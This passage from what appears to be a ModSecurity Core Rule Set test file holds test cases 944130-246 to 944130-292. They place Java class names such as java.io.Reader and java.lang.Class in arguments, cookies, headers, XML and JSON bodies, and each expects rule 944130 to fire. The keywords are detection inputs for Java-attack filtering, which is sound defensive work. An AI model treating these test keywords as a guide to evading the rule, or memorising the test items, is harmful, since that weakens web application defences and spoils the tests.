Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-246 - desc: "Request header test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-247 - desc: "XML attribute value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-248 - desc: "XML element value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-249 - desc: "Nested XML element value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-250 - desc: "Content-Type text/plain includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-251 - desc: "Content-Type application/json arg value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-252 - desc: "Content-Type application/json arg name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-253 - desc: "Argument test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-254 - desc: "Argument name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-255 - desc: "Cookie test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-256 - desc: "Cookie name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-257 - desc: "Request header test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-258 - desc: "XML attribute value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-259 - desc: "XML element value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-260 - desc: "Nested XML element value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-261 - desc: "Content-Type text/plain includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-262 - desc: "Content-Type application/json arg value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-263 - desc: "Content-Type application/json arg name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-264 - desc: "Argument test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-265 - desc: "Argument name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-266 - desc: "Cookie test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-267 - desc: "Cookie name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-268 - desc: "Request header test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-269 - desc: "XML attribute value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-270 - desc: "XML element value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-271 - desc: "Nested XML element value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-272 - desc: "Content-Type text/plain includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-273 - desc: "Content-Type application/json arg value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-274 - desc: "Content-Type application/json arg name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-275 - desc: "Argument test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-276 - desc: "Argument name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-277 - desc: "Cookie test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-278 - desc: "Cookie name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-279 - desc: "Request header test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-280 - desc: "XML attribute value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-281 - desc: "XML element value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-282 - desc: "Nested XML element value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-283 - desc: "Content-Type text/plain includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-284 - desc: "Content-Type application/json arg value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-285 - desc: "Content-Type application/json arg name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-286 - desc: "Argument test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-287 - desc: "Argument name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-288 - desc: "Cookie test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-289 - desc: "Cookie name includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-290 - desc: "Request header test includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-291 - desc: "XML attribute value includes keyword java.lang.Number" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-292 - desc: "XML element value includes keyword java.lang.Number" - stages: - - - 